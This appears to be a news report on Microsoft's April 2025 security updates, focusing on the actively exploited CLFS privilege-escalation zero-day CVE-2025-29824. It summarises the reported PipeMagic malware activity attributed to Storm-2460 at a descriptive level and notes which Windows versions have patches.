Microsoft has released critical security updates for more than 130 flaws as part of its April 2025 Patch Tuesday. Most importantly, the updates address a zero-day flaw that is currently being exploited by threat actors.
The flaw, tracked as CVE-2025-29824, is a Windows Common Log File System (CLFS) Driver Elevation of Privilege Vulnerability. The vulnerability allows local attackers to escalate their privileges to SYSTEM level on the affected device, potentially giving them full control over the system.
Microsoft has confirmed that this vulnerability has been actively exploited in the wild, although the exploitation appears to be limited to a small number of specific targets. The affected sectors include IT and real estate firms in the US, the financial sector in Venezuela, a Spanish software company, and the retail industry in Saudi Arabia.
The exploitation of the flaw has been linked to the PipeMagic malware, a tool previously associated with several high-profile cyberattacks. Microsoft attributes the ongoing exploitation activity to the Storm-2460 threat group, which is also known for deploying ransomware using PipeMagic. Storm-2460 has a history of utilizing sophisticated techniques to gain initial access to target systems and move laterally within compromised environments.
Microsoft said it has yet to determine the exact initial access vectors, but it observed Storm-2460 using the certutil utility, a legitimate Windows tool, to download a malicious file from a compromised third-party website. The downloaded file contains an MSBuild script, which in turn carries an encrypted malware payload.
Once executed, the malware decrypts itself and leverages the EnumCalendarInfoA API callback to deliver the PipeMagic malware to the compromised system. In 2023, researchers from ESET observed threat actors using PipeMagic in connection with the exploitation of another zero-day vulnerability in the Win32k component, tracked as CVE-2025-24983.
As of now, Microsoft has released security patches for Windows Server and Windows 11 systems to address the CVE-2025-29824 vulnerability. Windows 10 users will have to wait for a subsequent update, with patches expected to be made available at a later date.
